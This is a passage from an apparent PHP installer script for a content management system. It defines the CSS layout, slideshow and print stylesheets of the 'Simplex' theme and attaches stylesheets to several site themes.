[[\$light_grey]];\r\n	border-radius: 4px 4px 0 0;\r\n	text-decoration: none;\r\n	font-size: 11px;\r\n	text-transform: uppercase;\r\n}\r\n\r\n.news-summary ul.category-list li a:hover {\r\n	color: [[\$orange]];\r\n}\r\n\r\n.news-summary .paginate {\r\n	font: italic 11px/1.2 Georgia, Times New Roman, serif;\r\n}\r\n\r\n.news-summary .paginate a {\r\n	padding: 0 3px;\r\n}\r\n\r\n.news-meta {\r\n	background: [[\$light_grey]];\r\n	padding: 10px;\r\n	margin: 10px 0;\r\n}\r\n\r\n[[* /* more link */ *]]\r\n.more, .more a,\r\n[[* /* back link */ *]]\r\n.back, .back a,\r\n[[* /* previous, next links */ *]]\r\n.previous a, .next a, .previous, .next {\r\n	font: italic 12px/1.3 Georgia, Times New Roman, serif;\r\n	color: [[\$dark_grey]];\r\n	text-decoration: none;\r\n}\r\n\r\n[[* /* hover behavior of more, next, previous links */ *]]\r\n.more a:hover, .back a:hover, .previous a:hover, .next a:hover {\r\n	text-decoration: underline;\r\n}\r\n\r\n.previous, .next {\r\n	padding: 6px 0;\r\n}\r\n\r\n[[* /* align next link to right */ *]]\r\n.previous {\r\n	float: left;\r\n}\r\n\r\n.next {\r\n	float: right;\r\n}\r\n\r\n[[* /* ------ SIDEBAR AREA ------ */ *]]\r\n\r\n[[* /* news module summary -> sidebar */ *]]\r\n.sidebar .news-summary span.heading {\r\n	position: relative;\r\n	color: [[\$dark_grey]];\r\n	font: normal 1em/1.25 Georgia, Times New Roman, serif;\r\n	margin: 0 0 15px 0;\r\n	display: block;\r\n}\r\n\r\n.sidebar .news-summary span.heading:after {\r\n	content: '';\r\n	height: 1px;\r\n	display: block;\r\n	width: 100%;\r\n	border-bottom: 1px dotted #ddd;\r\n	position: absolute;\r\n	top: 50%;\r\n}\r\n\r\n.sidebar .news-summary .heading span {\r\n	display: inline-block;\r\n	width: auto;\r\n	background: [[\$white]];\r\n	padding-right: 6px;\r\n	position: relative;\r\n	z-index: 10;\r\n}\r\n\r\n.sidebar .news-article {\r\n	padding: 15px;\r\n	position: relative;\r\n	background: [[\$light_grey]];\r\n	margin-bottom: 20px;\r\n	border-radius: 0 0 6px 0;\r\n	font-size: .8125em; [[* /* 13px */ *]]\r\n}\r\n\r\n[[* /* creating a bubble box with css3 */ *]]\r\n.sidebar .news-article:before {\r\n	content: '';\r\n	position: absolute;\r\n	bottom: -15px;\r\n	right: 25px;\r\n	width: 10px;\r\n	height: 35px;\r\n	-webkit-transform: rotate(55deg) skewY(55deg);\r\n	-moz-transform: rotate(55deg) skewY(55deg);\r\n	-o-transform: rotate(55deg) skewY(55deg);\r\n	-ms-transform: rotate(55deg) skewY(55deg);\r\n	transform: rotate(55deg) skewY(55deg);\r\n	background: [[\$light_grey]];\r\n}\r\n\r\n.lt-ie9 .sidebar .news-article:before {\r\n	display: none;\r\n}\r\n\r\n[[* /* ------ FOOTER AREA ------ */ *]]\r\n[[* /* footer wrapper */ *]]\r\n.footer {\r\n	position: relative;\r\n	border-top: 8px solid [[\$light_grey]];\r\n	margin: 25px 0 10px 0;\r\n	padding-top: 20px;\r\n	padding-bottom: 20px;\r\n}\r\n\r\n.footer:before {\r\n	content: ' ';\r\n	border-top: 2px dotted [[\$white]];\r\n	border-bottom: 2px dotted [[\$white]];\r\n	height: 4px;\r\n	display: block;\r\n	position: absolute;\r\n	width: 100%;\r\n	top: -8px;\r\n	left: 0;\r\n}\r\n\r\n[[* /* copyright text */ *]]\r\n.copyright {\r\n	padding-top: 15px;\r\n}\r\n\r\n.copyright-info {\r\n	color: [[\$dark_grey]];\r\n	font-size: .6875em; [[* /* 11px */ *]]\r\n}\r\n\r\n[[* /* social icons */ *]]\r\n.footer ul.social {\r\n	padding: 0;\r\n	margin: 0;\r\n	list-style: none;\r\n	text-align: center;\r\n}\r\n\r\n.footer .social li {\r\n	display: inline;\r\n	margin: 0;\r\n	padding: 0;\r\n	margin-right: 6px;\r\n}\r\n\r\n.footer .social li a {\r\n	display: inline-block;\r\n	text-decoration: none;\r\n	font-size: 2.625em;\r\n	line-height: 1;\r\n	color: [[\$dark_grey]];\r\n}\r\n\r\n.footer .social li a:hover {\r\n	color: [[\$orange]];\r\n}\r\n\r\n.footer .social li a i {\r\n	display: inline-block;\r\n}\r\n\r\n[[* /* back to top anchor */ *]]\r\n.back-top a {\r\n	display: inline-block;\r\n	width: 16px;\r\n	height: 16px;\r\n	line-height: 16px;\r\n	padding: 8px;\r\n	border: 5px solid [[\$white]];\r\n	text-decoration: none;\r\n	color: [[\$dark_grey]];\r\n	background-color: [[\$light_grey]];\r\n	border-radius: 500px;\r\n	-webkit-border-radius: 500px;\r\n	-moz-border-radius: 500px;\r\n	-o-border-radius: 500px;\r\n	position: absolute;\r\n	top: -24px;\r\n	left: 50%;\r\n	margin-left: -12px;\r\n	-webkit-transition: all 200ms ease-in-out;\r\n	-moz-transition: all 200ms ease-in-out;\r\n	-ms-transition: all 200ms ease-in-out;\r\n	-o-transition: all 200ms ease-in-out;\r\n	transition: all 200ms ease-in-out;\r\n}\r\n\r\n.back-top a:hover {\r\n	background-color: [[\$orange]];\r\n	color: [[\$white]];\r\n	-webkit-transform: scale(1.1);\r\n	-moz-transform: scale(1.1);\r\n	-ms-transform: scale(1.1);\r\n	-o-transform: scale(1.1);\r\n	transform: scale(1.1);\r\n}\r\n\r\n[[* /* Footer navigation */ *]]\r\n.footer-navigation {\r\n	padding-top: 15px;\r\n	border-bottom: 1px solid [[\$light_grey]];\r\n}\r\n\r\n#footer-menu li > a,\r\n#footer-menu li.sectionheader > span {\r\n	color: [[\$dark_grey]];\r\n	display: block;\r\n	text-decoration: none;\r\n}\r\n\r\n#footer-menu li > a:hover,\r\n#footer-menu li > a.current,\r\n#footer-menu li.sectionheader > span:hover,\r\n#footer-menu li.sectionheader > span.current {\r\n	color: [[\$orange]];\r\n} \r\n\r\n#footer-menu > li > a,\r\n#footer-menu > li.sectionheader > span {\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	text-transform: uppercase;\r\n	text-decoration: none;\r\n	display: block;\r\n}\r\n\r\n#footer-menu > li > ul > li > a,\r\n#footer-menu > li > ul > li.sectionheader > span {\r\n	font-size: .875em; [[* /* 14px */ *]]\r\n	padding: 2px 0;\r\n}\r\n\r\n#footer-menu > li > ul {\r\n	margin: 15px 0;\r\n}\r\n\r\n[[* /* =====================================\r\n SCREENS BIGGER THAN 768px\r\n ===================================== */ *]]\r\n\r\n@media screen and (min-width: 768px) {\r\n\r\n	.lt-768 {\r\n		display: none;\r\n	}\r\n\r\n	.logo {\r\n		margin-top: 12px;\r\n		position: relative;\r\n		text-align: left;\r\n	}\r\n\r\n	[[* /* having some fun with palm, rotating with css3, will not work in IE */ *]]\r\n	.logo .palm {\r\n		position: absolute;\r\n		top: 5px;\r\n		left: 45px;\r\n		background: url([[\$path]]/palm-circle.png) no-repeat;\r\n		display: block;\r\n		width: 48px;\r\n		height: 48px;\r\n		transition: transform 0.6s ease-out;\r\n		-webkit-transition: -webkit-transform 0.6s ease-out;\r\n		-moz-transition: -moz-transform 0.6s ease-out;\r\n		-o-transition: -o-transform 0.6s ease-out;\r\n		-webkit-perspective: 1000;\r\n		-webkit-backface-visibility: hidden;\r\n	}\r\n\r\n	[[* /* css3 transform rotating palm on hover */ *]]\r\n	.logo a:hover .palm {\r\n		transform: rotate(360deg);\r\n		-webkit-transform: rotate(360deg);\r\n		-moz-transform: rotate(360deg);\r\n		-o-transform: rotate(360deg);\r\n	}\r\n\r\n	[[* /* ------ NAVIGATION ------ */ *]]\r\n\r\n	nav.main-navigation {\r\n		z-index: 990;\r\n		height: 55px;\r\n		line-height: 37px;\r\n		margin-top: 20px;\r\n	}\r\n\r\n	#main-menu {\r\n		float: right;\r\n		margin-top: 0;\r\n	}\r\n	\r\n	[[* /* --- FIRST LEVEL --- */ *]]\r\n	#main-menu > li {\r\n		display: inline-block;\r\n		padding: 0;\r\n		margin: 0 4px;\r\n		border: none;\r\n		position: relative;\r\n	}\r\n	\r\n	[[* /* PARENT INICATOR */ *]]\r\n	#main-menu > li i {\r\n		display: none;\r\n	}\r\n	\r\n	.touch-device #main-menu > li i {\r\n		display: inline-block;\r\n		float: none;\r\n	}\r\n	\r\n	.touch-device #main-menu > li li i {\r\n		float: left;\r\n		display: inline-block;\r\n		margin-right: 8px;\r\n		padding-top: 2px;\r\n		text-align: left;\r\n	}\r\n	\r\n	.touch-device #main-menu > li:first-child li i {\r\n		float: right;\r\n	}\r\n\r\n	#main-menu > li:first-child, #main-menu > li.first {\r\n		margin-left: 0;\r\n	}\r\n\r\n	#main-menu > li:last-child, #main-menu > li.last {\r\n		margin-right: 0;\r\n	}\r\n\r\n	#main-menu > li > a, \r\n	#main-menu > li.sectionheader span {\r\n		padding: 0 6px 0 10px;\r\n		line-height: 37px;\r\n		font-size: 1em;\r\n	}\r\n\r\n	#main-menu > li.parent:hover > a, \r\n	#main-menu > li.sectionheader.parent:hover > span,\r\n	#main-menu > li.parent.active > a, \r\n	#main-menu > li.parent.active > span {\r\n		color: [[\$white]];\r\n		background-color: [[\$dark_grey]];\r\n		background-color: rgba(85, 85, 85, .95);\r\n	}\r\n\r\n	[[* /* --- SECOND LEVEL --- */ *]]\r\n	#main-menu > li > ul,\r\n	#main-menu > li > ul > li > ul [[* /* third level */ *]] {\r\n		display: block;\r\n		width: 260px;\r\n	}\r\n\r\n	#main-menu > li:hover > ul,\r\n	#main-menu > li.active > ul,\r\n	#main-menu > li > ul > li:hover > ul,\r\n	#main-menu > li > ul > li.active > ul {\r\n		height: auto;\r\n		position: absolute;\r\n		z-index: 9999;\r\n		top: 37px;\r\n		right: 0;\r\n		left: auto;\r\n		display: block;\r\n		border-radius: 3px;\r\n	}\r\n	\r\n	#main-menu > li:first-child:hover > ul,\r\n	#main-menu > li:first-child.active > ul {\r\n		right: auto;\r\n		left: 0;\r\n	}\r\n	\r\n	#main-menu > li > ul > li {\r\n		position: relative;\r\n		line-height: 1;\r\n		margin: 0;\r\n		padding-left: 10px;\r\n	}\r\n	\r\n	#main-menu > li:first-child > ul > li {\r\n		padding-right: 10px;\r\n		padding-left: 0;\r\n	}\r\n	\r\n	#main-menu > li > ul > li > a,\r\n	#main-menu > li > ul > li.sectionheader > span,\r\n	#main-menu > li > ul > li > ul > li > a,\r\n	#main-menu > li > ul > li > ul > li.sectionheader > span {\r\n		color: [[\$white]];\r\n		display: block;\r\n		text-transform: none;\r\n		line-height: 1.2;\r\n		border-bottom: 1px dotted #858585;\r\n		background-color: [[\$dark_grey]];\r\n		background-color: rgba(90, 90, 90, .98);\r\n		padding: 8px 12px;\r\n		font-size: .875em; [[* /* 14px */ *]]\r\n		text-decoration: none;\r\n	}\r\n	\r\n	#main-menu > li > ul > li.current > a, \r\n	#main-menu > li > ul > li.current.sectionheader > span,\r\n	#main-menu > li > ul > li > ul > li.current > a, \r\n	#main-menu > li > ul > ul > li > li.current.sectionheader > span {\r\n		color: [[\$orange]];\r\n	}\r\n\r\n	[[* /* THIRD LEVEL */ *]]\r\n	#main-menu > li > ul > li:hover > ul,\r\n	#main-menu > li > ul > li.active > ul {\r\n		width: 250px;\r\n		height: auto;\r\n		top: 0;\r\n		right: auto;\r\n		left: -250px;\r\n	}\r\n	\r\n	#main-menu > li:first-child > ul > li:hover > ul,\r\n	#main-menu > li:first-child > ul > li.active > ul {\r\n		left: auto;\r\n		right: -250px;\r\n	}\r\n	\r\n	.lt-ie9 #main-menu > li > ul > li:hover > ul,\r\n	.lt-ie9 #main-menu > li > ul > li.active > ul {\r\n		left: -247px;\r\n	}\r\n\r\n	#main-menu > li > ul > li:hover > ul:after,\r\n	#main-menu > li > ul > li.active > ul:after {\r\n		content: ' ';\r\n		width: 0px;\r\n		height: 0px;\r\n		border-style: solid;\r\n		border-width: 7px 0 7px 6px;\r\n		border-color: transparent transparent transparent [[\$dark_grey]];\r\n		border-color: transparent transparent transparent rgba(85, 85, 85, .95);\r\n		position: absolute;\r\n		right: -6px;\r\n		top: 12px;\r\n	}\r\n	\r\n	.lt-ie9 #main-menu > li:first-child > ul > li:hover > ul,\r\n	.lt-ie9 #main-menu > li:first-child > ul > li.active > ul {\r\n		left: auto;\r\n		right: -247px;\r\n	}\r\n	\r\n	#main-menu > li:first-child > ul > li:hover > ul:after,\r\n	#main-menu > li:first-child > ul > li.active > ul:after {\r\n		left: -10px;\r\n		right: auto;\r\n	}\r\n\r\n	#main-menu li ul li a:hover, \r\n	#main-menu li ul li span.sectionheader:hover {\r\n		box-shadow: 0 0 5px rgba(85, 85, 85, .9);\r\n		z-index: 2;\r\n	}\r\n\r\n	#main-menu > ul > li:last-child > a,\r\n	#main-menu > ul > li.sectionheader:last-child > span,\r\n	#main-menu > ul > li > ul > li:last-child > a,\r\n	#main-menu > ul > li > ul > li.sectionheader:last-child > span {\r\n		border-bottom: none;\r\n	}\r\n\r\n	.header-bottom {\r\n		height: 55px;\r\n		line-height: 55px;\r\n		padding: 8px 0;\r\n	}\r\n	\r\n	.phrase-text {\r\n		text-align: left;\r\n	}\r\n\r\n	input.search-input {\r\n		height: 17px;\r\n		line-height: 17px;\r\n		width: 100%;\r\n		max-width: 320px;\r\n	}\r\n	\r\n	input.search-input:focus {\r\n		max-width: 90%;\r\n	}\r\n	\r\n	[[* /* print button */ *]]\r\n	a.printbutton {\r\n		display: block;\r\n		padding-left: 6px;\r\n		width: 16px;\r\n		height: 16px;\r\n		float: right;\r\n		text-decoration: none;\r\n		color: [[\$dark_grey]];\r\n		background-color: [[\$white]];\r\n		z-index: 1;\r\n		position: relative;\r\n	}\r\n	\r\n	a.printbutton i {\r\n		display: inline-block;\r\n		-webkit-transform: rotateY(0deg);\r\n		-moz-transform: rotateY(0deg);\r\n		-ms-transform: rotateY(0deg);\r\n		-o-transform: rotateY(0deg);\r\n		transform: rotateY(0deg);\r\n		-webkit-transition: -webkit-transform 250ms ease-out 0s;\r\n		-moz-transition: -moz-transform 250ms ease-out 0s;\r\n		-o-transition: -o-transform 250ms ease-out 0s;\r\n		transition: transform 250ms ease-out 0s;\r\n	}\r\n	\r\n	a.printbutton:hover {\r\n		color: [[\$orange]];\r\n	}\r\n	\r\n	a.printbutton:hover i {\r\n		-webkit-transform: rotateY(360deg);\r\n		-moz-transform: rotateY(180deg);\r\n		-ms-transform: rotateY(360deg);\r\n		-o-transform: rotateY(360deg);\r\n		transform: rotateY(360deg);\r\n	}\r\n	\r\n	[[* /* --- FOOTER --- */ *]]\r\n	\r\n	.footer ul.social {\r\n		text-align: left;\r\n	}\r\n	\r\n	.footer .social li a i {\r\n		display: inline-block;\r\n		-webkit-transform: rotateY(0deg);\r\n		-moz-transform: rotateY(0deg);\r\n		-ms-transform: rotateY(0deg);\r\n		-o-transform: rotateY(0deg);\r\n		transform: rotateY(0deg);\r\n		-webkit-transition: -webkit-transform 250ms ease-out 0s;\r\n		-moz-transition: -moz-transform 250ms ease-out 0s;\r\n		-ms-transition: -moz-transform 250ms ease-out 0s;\r\n		-o-transition: -o-transform 250ms ease-out 0s;\r\n		transition: transform 250ms ease-out 0s;\r\n	}\r\n	\r\n	.footer .social li a:hover i {\r\n		-webkit-transform: rotateY(360deg);\r\n		-moz-transform: rotateY(180deg);\r\n		-ms-transform: rotateY(360deg);\r\n		-o-transform: rotateY(360deg);\r\n		transform: rotateY(360deg);\r\n	}\r\n	\r\n	[[* /* --- Footer Navigation --- */ *]]\r\n	\r\n	.footer-navigation {\r\n		border-bottom: none;\r\n	}\r\n	\r\n	#footer-menu > li {\r\n		float: left;\r\n		display: block;\r\n		position: relative;\r\n		margin-left: 3.8%;\r\n		width: 30.75%;\r\n	}\r\n	\r\n	#footer-menu > li:first-child {\r\n		margin-left: 0;\r\n	} \r\n}\r\n\r\n[[* /* ================================================\r\n WHEN LAYOUT BREAKS IT'S TIME FOR NEW MEDIA QUERY\r\n ================================================== */ *]]\r\n@media only screen and (max-width: 780px) {\r\n\r\n	.search {\r\n		margin-top: 15px;\r\n	}\r\n	\r\n	input.search-input {\r\n		width: 100%;\r\n		max-width: 100%;\r\n		float: left;\r\n	}\r\n	\r\n	input.search-input:focus {\r\n		max-width: none;\r\n	}\r\n	\r\n	.header-bottom {\r\n		padding-top: 20px;\r\n		text-align: center;\r\n		line-height: inherit;\r\n		padding: 20px 0;\r\n	}\r\n\r\n	\r\n}\r\n\r\n@media only screen and (min-width: 940px) and (max-width: 1110px) {\r\n	\r\n	#main-menu > li {\r\n		margin: 0;\r\n	}\r\n	\r\n	#main-menu > li > a, \r\n	#main-menu > li.sectionheader span {\r\n		padding: 0 6px;\r\n	}\r\n}\r\n\r\n@media only screen and (min-width: 768px) and (max-width: 1050px) {\r\n	\r\n	.row nav.main-navigation {\r\n		height: auto;\r\n		float: none;\r\n		display: block;\r\n		margin-left: 0;\r\n		width: 100%;\r\n		clear: left;\r\n	}\r\n	\r\n	#main-menu {\r\n		margin-top: 15px;\r\n		margin-bottom: 15px;\r\n		border-bottom: 1px solid [[\$light_grey]];\r\n		float: none;\r\n		display: block;\r\n		\r\n	}\r\n	\r\n	#main-menu > li {\r\n		margin: 0;\r\n		bottom: -1px;\r\n		text-align: center;\r\n		border-bottom: 1px solid [[\$light_grey]];\r\n		border-right: 1px solid [[\$light_grey]];\r\n		border-top: 1px solid [[\$light_grey]];\r\n	}\r\n	\r\n	#main-menu > li.current {\r\n		border-bottom-color: [[\$white]];\r\n		border-top-color: [[\$orange]];\r\n	}\r\n	\r\n	#main-menu > li.current > a {\r\n		border-top: 1px solid [[\$orange]];\r\n		line-height: 45px;\r\n	}\r\n	\r\n	#main-menu > li:first-child {\r\n		border-left: 1px solid [[\$light_grey]];\r\n	}\r\n	\r\n	#main-menu > li > a,\r\n	#main-menu > li > span {\r\n		line-height: 46px;\r\n		padding-left: 12px;\r\n		padding-right: 6px;\r\n	}\r\n	\r\n	#main-menu > li:hover > ul,\r\n	#main-menu > li.active > ul {\r\n		top: 45px;\r\n	}\r\n\r\n	.header-bottom {\r\n		height: auto;\r\n	}\r\n	\r\n	.row .seven-col.phrase-text,\r\n	.row .five-col.search {\r\n		display: block;\r\n		float: none;\r\n		width: 100%;\r\n		margin-left: 0;\r\n		text-align: center;\r\n	}\r\n}\r\n\r\n[[* /* ================================================\r\n WINDOWS 8 SNAP VIEW (yeah yeah W3C blah blah)\r\n ================================================== */ *]]\r\n@-ms-viewport {\r\n	width: device-width;\r\n}\r\n\r\n@-o-viewport {\r\n	width: device-width;\r\n}\r\n\r\n@-moz-viewport {\r\n	width: device-width;\r\n}\r\n\r\n@-webkit-viewport {\r\n	width: device-width;\r\n}\r\n\r\n@viewport {\r\n	width: device-width;\r\n}\r\n[[/strip]]
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Simplex Layout');
$css->set_description('Simplex Theme main layout Stylesheet');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
[[strip]]\r\n\r\n[[* /* ------ BANNER AREA ------ */  *]]\r\n.banner {\r\n	background: #fefefe; \r\n	background: url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8c3ZnIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgdmlld0JveD0iMCAwIDEgMSIgcHJlc2VydmVBc3BlY3RSYXRpbz0ibm9uZSI+CiAgPGxpbmVhckdyYWRpZW50IGlkPSJncmFkLXVjZ2ctZ2VuZXJhdGVkIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeDE9IjAlIiB5MT0iMCUiIHgyPSIwJSIgeTI9IjEwMCUiPgogICAgPHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2ZlZmVmZSIgc3RvcC1vcGFjaXR5PSIxIi8+CiAgICA8c3RvcCBvZmZzZXQ9IjQ3JSIgc3RvcC1jb2xvcj0iI2YxZjFmMSIgc3RvcC1vcGFjaXR5PSIxIi8+CiAgICA8c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNlOWU5ZTkiIHN0b3Atb3BhY2l0eT0iMSIvPgogIDwvbGluZWFyR3JhZGllbnQ+CiAgPHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgZmlsbD0idXJsKCNncmFkLXVjZ2ctZ2VuZXJhdGVkKSIgLz4KPC9zdmc+);\r\n	background: -moz-linear-gradient(top,  #fefefe 0%, #f1f1f1 47%, #e9e9e9 100%);\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fefefe), color-stop(47%,#f1f1f1), color-stop(100%,#e9e9e9)); \r\n	background: -webkit-linear-gradient(top,  #fefefe 0%,#f1f1f1 47%,#e9e9e9 100%);\r\n	background: -o-linear-gradient(top,  #fefefe 0%,#f1f1f1 47%,#e9e9e9 100%); \r\n	background: -ms-linear-gradient(top,  #fefefe 0%,#f1f1f1 47%,#e9e9e9 100%);\r\n	background: linear-gradient(to bottom,  #fefefe 0%,#f1f1f1 47%,#e9e9e9 100%); \r\n}\r\n\r\n.lt-ie9 .banner {\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fefefe', endColorstr='#e9e9e9',GradientType=0 );\r\n}\r\n\r\n#sx-slides {\r\n	position: relative;\r\n	overflow: hidden;\r\n	width: 100%;\r\n	margin: 0 auto;\r\n	position: relative;\r\n	height: 380px;\r\n}\r\n\r\n#sx-slides > .sequence-canvas {\r\n	height: 100%;\r\n	width: 100%;\r\n	margin: 0;\r\n	padding: 0;\r\n	list-style: none;\r\n}\r\n\r\n#sx-slides > .sequence-canvas > li {\r\n	position: absolute;\r\n	width: 100%;\r\n	height: 100%;\r\n	z-index: 1;\r\n	top: -50%;\r\n}\r\n\r\n#sx-slides > .sequence-canvas > li img {\r\n	height: 96%;\r\n}\r\n\r\n#sx-slides > .sequence-canvas li > * {\r\n	position: absolute;\r\n	-webkit-transition-property: left, bottom, right, top, -webkit-transform, opacity;\r\n	-moz-transition-property: left, bottom, right, top, -moz-opacity;\r\n	-ms-transition-property: left, bottom, right, top, -ms-opacity;\r\n	-o-transition-property: left, bottom, right, top, -o-opacity;\r\n	transition-property: left, bottom, right, top, transform, opacity;\r\n}\r\n\r\n#sx-slides .title {\r\n	color: [[\$orange]];\r\n	font-size: 2.25em;\r\n	line-height: 1.1;\r\n	font-weight: 700;\r\n	left: 65%;\r\n	opacity: 0;\r\n	bottom: 22%;\r\n	z-index: 50;\r\n	margin-top: 0;\r\n}\r\n\r\n#sx-slides .animate-in .title {\r\n	left: 12%;\r\n	opacity: 1;\r\n	-webkit-transition-duration: 0.8s;\r\n	-moz-transition-duration: 0.8s;\r\n	-ms-transition-duration: 0.8s;\r\n	-o-transition-duration: 0.8s;\r\n	transition-duration: 0.8s;\r\n}\r\n\r\n#sx-slides .animate-out .title {\r\n	left: 35%;\r\n	opacity: 0;\r\n	-webkit-transition-duration: 0.3s;\r\n	-moz-transition-duration: 0.3s;\r\n	-ms-transition-duration: 0.3s;\r\n	-o-transition-duration: 0.3s;\r\n	transition-duration: 0.3s;\r\n}\r\n\r\n#sx-slides .subtitle {\r\n	margin-top: 0;\r\n	z-index: 5;\r\n	color: [[\$dark_grey]];\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	font-weight: 700;\r\n	font-size: 1.8125em;\r\n	left: 35%;\r\n	opacity: 0;\r\n	top: 72%;\r\n}\r\n\r\n#sx-slides .animate-in .subtitle {\r\n	left: 20%;\r\n	opacity: 1;\r\n	-webkit-transition-duration: 1.3s;\r\n	-moz-transition-duration: 1.3s;\r\n	-ms-transition-duration: 1.3s;\r\n	-o-transition-duration: 1.3s;\r\n	transition-duration: 1.3s;\r\n}\r\n\r\n#sx-slides .animate-out .subtitle {\r\n	left: 65%;\r\n	opacity: 0;\r\n	-webkit-transition-duration: 0.8s;\r\n	-moz-transition-duration: 0.8s;\r\n	-ms-transition-duration: 0.8s;\r\n	-o-transition-duration: 0.8s;\r\n	transition-duration: 0.8s;\r\n}\r\n\r\n\r\n#sx-slides .image {\r\n	left: -10px;\r\n	position: absolute;\r\n	bottom: 800px;\r\n	-webkit-transform: rotate(-90deg);\r\n	-moz-transform: rotate(-90deg);\r\n	-ms-transform: rotate(-90deg);\r\n	-o-transform: rotate(-90deg);\r\n	transform: rotate(-90deg);\r\n	opacity: 0;\r\n	max-width: 70%;\r\n	height: auto !important;\r\n	max-height: 275px !important;\r\n}\r\n\r\n#sx-slides .animate-in .image {\r\n	left: 14%;\r\n	bottom: -49%;\r\n	opacity: 1;\r\n	-webkit-transform: rotate(0deg);\r\n	-moz-transform: rotate(0deg);\r\n	-ms-transform: rotate(0deg);\r\n	-o-transform: rotate(0deg);\r\n	transform: rotate(0deg);\r\n	-webkit-transition-duration: 2s;\r\n	-moz-transition-duration: 2s;\r\n	-ms-transition-duration: 2s;\r\n	-o-transition-duration: 2s;\r\n	transition-duration: 2s;\r\n}\r\n\r\n#sx-slides .animate-out .image {\r\n	left: -10px;\r\n	bottom: -800px;\r\n	opacity: 0;\r\n	-webkit-transform: rotate(-90deg);\r\n	-moz-transform: rotate(-90deg);\r\n	-ms-transform: rotate(-90deg);\r\n	-o-transform: rotate(-90deg);\r\n	transform: rotate(-90deg);\r\n	-webkit-transition-duration: 1s;\r\n	-moz-transition-duration: 1s;\r\n	-ms-transition-duration: 1s;\r\n	-o-transition-duration: 1s;\r\n	transition-duration: 1s;\r\n}\r\n\r\n@media only screen and (min-width: 768px) {\r\n	\r\n	#sx-slides .title {\r\n		font-size: 3em;\r\n	}\r\n\r\n	#sx-slides .animate-in .title {\r\n		left: 3%;\r\n	}\r\n	\r\n	#sx-slides .subtitle {\r\n		font-size: 2.5em;\r\n	}\r\n	\r\n	#sx-slides .animate-in .subtitle {\r\n		left: 8%;\r\n	}\r\n\r\n	#sx-slides .image {\r\n		left: auto;\r\n		right: -10px;\r\n		position: absolute;\r\n		max-width: 70%;\r\n		height: auto !important;\r\n		max-height: 300px !important;\r\n	}\r\n	\r\n	#sx-slides .animate-in .image {\r\n		left: auto;\r\n		right: 5%;\r\n		bottom: -45%;\r\n	}\r\n	\r\n	#sx-slides .animate-out .image {\r\n		left: auto;\r\n		bottom: -800px;\r\n	}\r\n}\r\n\r\n@media only screen and (min-width: 1050px) {\r\n	\r\n	#sx-slides {\r\n		height: 440px;\r\n	}\r\n	\r\n	#sx-slides .title {\r\n		font-size: 3.25em;\r\n		bottom: 15%;\r\n	}\r\n\r\n	#sx-slides .animate-in .title {\r\n		left: 8%;\r\n	}\r\n	\r\n	#sx-slides .subtitle {\r\n		font-size: 2.875em;\r\n		top: 78%\r\n	}\r\n	\r\n	#sx-slides .animate-in .subtitle {\r\n		left: 12%;\r\n	}\r\n\r\n	#sx-slides .image {\r\n		max-width: 90%;\r\n		height: auto !important;\r\n		max-height: 400px !important;\r\n	}\r\n}\r\n\r\n[[/strip]]
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Simplex Slideshow');
$css->set_description('Simplex Theme Stylesheet for header slideshow');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
[[strip]]\r\n\r\n[[* /* reset body background and color, just in case */ *]]\r\nbody {\r\n    background: #fff;\r\n    color: #000;\r\n    font-family: Georgia, Times New Roman, serif;\r\n    font-size: 12pt\r\n}\r\n[[* /* any element with class noprint or listed below should not be printed */ *]]\r\n.noprint,\r\n.visuallyhidden {\r\n    display: none\r\n}\r\n[[* /* display image as block */ *]]\r\nimg {\r\n    display: block;\r\n    float: none\r\n}\r\n[[* /* links arent clickable on paper, lets display url */ *]]\r\na:link:after {\r\n    content: " (" attr(href) ") ";\r\n}\r\na {\r\n    text-decoration: underline\r\n}\r\n\r\n[[/strip]]
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Simplex Print'); // id = 52
$css->set_description('Default Print style rules attached to Simplex Design');
$css->set_content($txt);
$css->set_media_types('print');
$css->save();
$css_list[$css->get_name()] = $css;


// now attach stylesheets to the themes.
verbose_msg(ilang('install_attachstylesheets'));
$css_menuleft_1col_theme->add_stylesheet($css_list['Layout Left sidebar + 1 column']->get_id());
$css_menuleft_1col_theme->add_stylesheet($css_list['Navigation CSSMenu - Vertical']->get_id());
$css_menuleft_1col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']->get_id());
$css_menuleft_1col_theme->add_stylesheet($css_list['Print']->get_id());
$css_menuleft_1col_theme->add_stylesheet($css_list['Module News']->get_id());
$css_menuleft_1col_theme->add_stylesheet($css_list['Navigation FatFootMenu']->get_id());
$css_menuleft_1col_theme->save();

$css_menutop_2col_theme->add_stylesheet($css_list['Layout Top menu + 2 columns']->get_id());
$css_menutop_2col_theme->add_stylesheet($css_list['Navigation CSSMenu - Horizontal']->get_id());
$css_menutop_2col_theme->add_stylesheet($css_list['Module News']->get_id());
$css_menutop_2col_theme->add_stylesheet($css_list['Print']->get_id());
$css_menutop_2col_theme->add_stylesheet($css_list['Navigation FatFootMenu']->get_id());
$css_menutop_2col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']->get_id());
$css_menutop_2col_theme->save();

$leftsimple_1col_theme->add_stylesheet($css_list['Layout Left sidebar + 1 column']->get_id());
$leftsimple_1col_theme->add_stylesheet($css_list['Navigation Simple - Vertical']->get_id());
$leftsimple_1col_theme->add_stylesheet($css_list['Module News']->get_id());
